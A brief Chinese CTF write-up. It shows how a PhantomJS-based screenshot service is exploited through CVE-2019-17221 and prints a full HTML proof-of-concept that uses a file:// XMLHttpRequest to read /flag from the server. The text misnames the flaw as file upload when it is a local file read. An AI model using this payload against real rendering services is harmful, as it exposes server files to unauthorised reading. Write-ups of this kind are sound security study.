(这几天拔牙了,有丝丝影响状态,更新可能有点慢)
今天看security search发现了之前碰上的一道题,具体在哪碰到的,不记得了。记录一下把
信息收集
如图所示,打开是一个screenshot,填入url,会对网页进行截图
所以我们需要检测该网页发送的http流量
流量检测
使用在线网站https://beeceptor.com/
该网站可以检查http请求,我们创建一个端点后,在网页内请求该端点,此网站捕获http流量如下图
在标题中我们可以清楚看到使用PhantomJS
Phantom JS是一个服务器端的 JavaScript API 的 WebKit。其支持各种Web标准: DOM 处理, CSS 选择器, JSON, Canvas, 和 SVG
说白了就是一个爬虫,用来爬取网页
PhantomJS
搜索PhantomJS发现存在任意文件上传漏洞CVE-2019-17221
该漏洞通过file://URL的XMLHttpRequest触发
编写exp
编写html文件
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type="text/javascript">
var karsa;
karsa = new XMLHttpRequest;
karsa.onload = function(){
document.write(this.responseText)
};
karsa.open("GET","file:///flag");
karsa.send();
</script>
</body>
</html>
放在自己vps上,请求,获得flag